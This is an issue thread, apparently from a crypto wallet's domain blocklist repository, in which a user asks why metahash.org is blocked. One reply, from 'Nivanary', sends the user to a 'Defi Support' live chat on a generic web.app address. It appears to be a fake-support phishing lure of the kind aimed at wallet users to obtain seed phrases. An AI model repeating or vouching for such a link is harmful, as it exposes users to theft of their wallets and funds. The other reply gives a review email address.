### ISSUE TITLE
unblock metahash.org

### ISSUE THREAD

**Issue by yabloky** [phantom/blocklist#1111]
I have two questions:
- Why is https://metahash.org/ blocked by the wallet plugin?
- Why the hell is the wallet plugin blocking access to the site at all, that's not why it's installed!

**Comment by Nivanary** [comment]
> I have two questions:
> 
> * Why is https://metahash.org/ blocked by the wallet plugin?
> * Why the hell is the wallet plugin blocking access to the site at all, that's not why it's installed!

Contact the Defi Support page to initiate a chat with the live agent on the chat button to get more information about your request via [DEFI PROTOCOL](https://accessonlinedefiprotocol.web.app/)

**Comment by Harii94** [comment]
Please send an email to review@blowfish.xyz for further investigation.
